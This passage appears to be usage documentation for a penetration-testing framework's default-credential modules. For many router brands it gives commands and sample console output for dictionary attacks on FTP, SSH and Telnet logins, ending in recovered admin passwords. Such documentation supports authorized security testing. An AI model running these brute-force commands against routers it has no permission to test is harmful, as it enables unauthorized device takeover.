2. Do: `use creds/routers/juniper/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/juniper/ssh_default_creds
rsf (Juniper Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Juniper Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Juniper Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/juniper/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/juniper/telnet_default_creds
rsf (Juniper Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Juniper Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Linksys Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/linksys/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/linksys/ftp_default_creds
rsf (Linksys Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Linksys Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/linksys/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/linksys/ssh_default_creds
rsf (Linksys Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Linksys Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/linksys/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/linksys/telnet_default_creds
rsf (Linksys Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Mikrotik Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/mikrotik/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/mikrotik/ftp_default_creds
rsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Mikrotik Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/mikrotik/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/mikrotik/ssh_default_creds
rsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Mikrotik Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/mikrotik/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/mikrotik/telnet_default_creds
rsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Movistar Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/movistar/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/movistar/ftp_default_creds
rsf (Movistar Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Movistar Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Movistar Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/movistar/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/movistar/ssh_default_creds
rsf (Movistar Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Movistar Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Movistar Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/movistar/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/movistar/telnet_default_creds
rsf (Movistar Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Movistar Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Netcore Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netcore/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netcore/ftp_default_creds
rsf (Netcore Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netcore Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Netcore Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netcore/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netcore/ssh_default_creds
rsf (Netcore Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netcore Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Netcore Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netcore/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netcore/telnet_default_creds
rsf (Netcore Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netcore Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Netgear Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netgear/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netgear/ftp_default_creds
rsf (Netgear Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netgear Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Netgear Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netgear/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netgear/ssh_default_creds
rsf (Netgear Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netgear Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Netgear Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netgear/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netgear/telnet_default_creds
rsf (Netgear Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netgear Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Netsys Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netsys/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netsys/ftp_default_creds
rsf (Netsys Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netsys Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Netsys Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netsys/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netsys/ssh_default_creds
rsf (Netsys Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netsys Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Netsys Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netsys/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netsys/telnet_default_creds
rsf (Netsys Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netsys Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against PFSense Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/pfsense/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/pfsense/ftp_default_creds
rsf (PFSense Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (PFSense Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against PFSense Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/pfsense/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/pfsense/ssh_default_creds
rsf (PFSense Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (PFSense Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against PFSense Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/pfsense/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/pfsense/telnet_default_creds
rsf (PFSense Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (PFSense Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Technicolor Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/technicolor/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/technicolor/ftp_default_creds
rsf (Technicolor Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Technicolor Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Technicolor Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/technicolor/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/technicolor/ssh_default_creds
rsf (Technicolor Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Technicolor Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Technicolor Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/technicolor/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/technicolor/telnet_default_creds
rsf (Technicolor Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Technicolor Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Thomson Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/thomson/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/thomson/ftp_default_creds
rsf (Thomson Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Thomson Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Thomson Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/thomson/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/thomson/ssh_default_creds
rsf (Thomson Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Thomson Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
